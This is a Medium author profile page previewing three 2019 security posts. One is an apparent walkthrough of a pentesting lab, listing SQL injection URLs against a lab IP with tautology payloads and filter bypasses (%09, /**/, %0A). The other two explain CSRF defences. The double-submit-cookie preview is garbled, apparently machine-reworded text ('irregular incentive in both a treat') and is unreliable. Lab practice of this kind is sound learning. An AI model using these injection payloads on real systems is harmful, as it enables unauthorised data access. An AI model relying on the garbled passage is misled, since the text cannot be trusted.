Open in app

Sign In

Write

Sign In

Vinura Budara
Vinura Budara

3 Followers

Home

About

Jun 13, 2019

DDos and Google hacking

SQL injections, Social Engineering, DOS, Google hacking web for pentester 1.Link:http://192.168.145.158/sqli/example1.php?name=root http://192.168.145.158/sqli/example1.php?name=root' or ‘1’=’1 2.http://192.168.145.158/sqli/example2.php?name=root http://192.168.145.158/sqli/example2.php?name=root' or ‘1’=’1 No space error http://192.168.145.158/sqli/example2.php?name=root'\tor\t'1'='1 encode \t though %09 http://192.168.145.158/sqli/example2.php?name=root'%09or%09'1'='1 3.Link:http://192.168.145.158/sqli/example3.php?name=root http://192.168.145.158/sqli/example3.php?name=root'%09or%09'1'='1 space error http://192.168.145.158/sqli/example3.php?name=root'/**/or/**/'1'='1 4.http://192.168.145.158/sqli/example4.php?id=2 http://192.168.145.158/sqli/example4.php?id=2'/**/or/**/'1'='1 http://192.168.145.158/sqli/example4.php?id=2 or 1=1 5.http://192.168.145.158/sqli/example5.php?id=2 http://192.168.145.158/sqli/example5.php?id=2 or 1=1 6.http://192.168.145.158/sqli/example6.php?id=2 http://192.168.145.158/sqli/example6.php?id=2 or 1=1 7.http://192.168.145.158/sqli/example7.php?id=2 http://192.168.145.158/sqli/example7.php?id=2%0A or 1=1 8.http://192.168.145.158/sqli/example8.php?order=name http://192.168.145.158/sqli/example8.php?order=name…

Hacking

4 min read

Hacking

4 min read


May 17, 2019

Synchronizer Token Pattern

I am going to explain what Cross-Site Request Forgery(CSRF) and Synchronizer token pattern is and how to implement CSRF protection with synchronizer token pattern. First, let’s take a look at what CSRF is and how it works. CSRF Attack — What is it? Cross site request forgery (CSRF), also known…

Synchronizer Token

3 min read

Synchronizer Token Pattern
Synchronizer Token Pattern
Synchronizer Token

3 min read


May 17, 2019

Double Submit Cookies Patterns

In this system, we send an irregular incentive in both a treat and as a solicitation parameter, with the server checking if the treat esteem and solicitation esteem coordinate. At the point when a client visits (even before verifying to avoid login CSRF), the site ought to produce a (cryptographically…

PHP

2 min read

Double Submit Cookies Patterns
Double Submit Cookies Patterns
PHP

2 min read

Vinura Budara

Vinura Budara

3 Followers

Help

Status

Writers

Blog

Careers

Privacy

Terms

About

Text to speech

Teams